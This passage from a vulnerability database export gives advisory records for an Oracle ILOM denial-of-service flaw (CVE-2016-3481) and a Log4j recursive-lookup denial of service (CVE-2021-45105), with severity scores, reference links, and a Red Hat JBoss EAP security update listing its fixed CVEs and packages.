"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 4, confidentialityImpact: "NONE", exploitabilityScore: 8, id: "CVE-2016-3481", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:S/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 4, confidentialityImpact: "NONE", exploitabilityScore: 8, id: "VHN-92300", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:S/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "NONE", exploitabilityScore: 3.1, id: "CVE-2016-3481", impactScore: 4, integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3481", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-3481", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-678", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-92300", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-3481", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", 
id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect availability via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle 
Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'HTTP' protocol. 
The 'Web' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability", sources: [ { db: "NVD", id: "CVE-2016-3481", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-3481", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91977", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003869", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-678", trust: 0.7, }, { db: "VULHUB", id: "VHN-92300", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-3481", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, id: "VAR-201607-0605", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-92300", }, ], trust: 0.01, }, last_update_date: "2024-11-23T21:02:58.529000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, 
data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component denial of service vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63038", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3481", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-3481", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91977", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3481", }, { trust: 0.8, url: 
"http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3481", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-92300", }, { db: "VULMON", id: "CVE-2016-3481", }, { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-92300", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-3481", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91977", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003869", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-678", }, { date: "2016-07-21T10:12:35.087000", db: "NVD", id: "CVE-2016-3481", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { 
"@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-92300", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-3481", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91977", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003869", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-678", }, { date: "2024-11-21T02:50:06", db: "NVD", id: "CVE-2016-3481", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Web Vulnerability", sources: [ { db: "JVNDB", id: "JVNDB-2016-003869", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, ], trust: 0.6, }, }
var-202112-1782
Vulnerability from variot
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Apache Log4j. Authentication is not required to exploit this vulnerability. The specific flaw exists within the StrSubstitutor class. The issue results from the lack of proper validation of user-supplied data, which can result in a resource exhaustion condition. An attacker can leverage this vulnerability to create a denial-of-service condition on the process. Log4j is an open source project of Apache. With Log4j, log output can be directed to a console, a file, a GUI component, or even a socket server, an NT event recorder, etc. Apache Log4j2 has a denial-of-service vulnerability. It arises when Apache Log4j2 is configured with a non-default Pattern Layout that contains a Context Lookup (for example: $${ctx:loginId}); in that configuration an unauthenticated attacker can supply crafted data that causes a denial of service on the server. Exposure therefore depends on both the layout configuration and whether untrusted input reaches the Thread Context Map; the fixed releases are listed above.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update Advisory ID: RHSA-2022:1297-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://access.redhat.com/errata/RHSA-2022:1297 Issue date: 2022-04-11 CVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046 CVE-2021-45105 CVE-2022-23302 CVE-2022-23305 CVE-2022-23307 =====================================================================
- Summary:
A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64
- Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.4 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
- log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender (CVE-2022-23305)
- log4j: Unsafe deserialization flaw in Chainsaw log viewer (CVE-2022-23307)
- log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)
- log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)
- log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
- log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)
- log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink (CVE-2022-23302)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender
2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)
2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern
2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender
2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink
2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender
2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7 JBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1 JBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034 JBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17) JBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console JBEAP-22839 - GSS Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001 JBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001 JBEAP-22900 - Tracker bug for the EAP 7.4.4 release for RHEL-8 JBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002 JBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001 JBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001 JBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001 JBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002 JBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final JBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final JBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001 JBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final JBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001 JBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26 JBEAP-23177 - (7.4.z) Upgrade XNIO from 
3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001 JBEAP-23323 - GSS WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend JBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002 JBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001 JBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002
- Package List:
Red Hat JBoss EAP 7.4 for RHEL 8:
Source: eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.src.rpm eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.src.rpm eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.src.rpm eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.src.rpm eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.src.rpm eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.src.rpm eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.src.rpm eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.src.rpm eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.src.rpm eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.src.rpm eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.src.rpm eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.src.rpm eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.src.rpm eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.src.rpm eap7-xom-1.3.7-1.redhat_00001.1.el8eap.src.rpm eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.src.rpm
noarch: eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-cli-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-commons-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-core-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-dto-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-hornetq-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-hqclient-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jdbc-store-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jms-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jms-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-journal-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-ra-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-selector-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-service-extensions-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-tools-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.noarch.rpm eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-core-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-entitymanager-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-envers-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-java8-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-cachestore-jdbc-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-cachestore-remote-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-client-hotrod-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm 
eap7-infinispan-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-component-annotations-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-core-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-spi-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-v53-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-server-migration-cli-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-server-migration-core-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.noarch.rpm eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-compensations-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jbosstxbridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jbossxts-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jts-idlj-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jts-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-api-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-bridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-util-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-txframework-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.noarch.rpm eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm 
eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-elytron-tool-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-javadocs-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-modules-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-openssl-java-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm eap7-xom-1.3.7-1.redhat_00001.1.el8eap.noarch.rpm eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.noarch.rpm
x86_64: eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm eap7-wildfly-openssl-el8-x86_64-debuginfo-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-4104 https://access.redhat.com/security/cve/CVE-2021-44832 https://access.redhat.com/security/cve/CVE-2021-45046 https://access.redhat.com/security/cve/CVE-2021-45105 https://access.redhat.com/security/cve/CVE-2022-23302 https://access.redhat.com/security/cve/CVE-2022-23305 https://access.redhat.com/security/cve/CVE-2022-23307 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
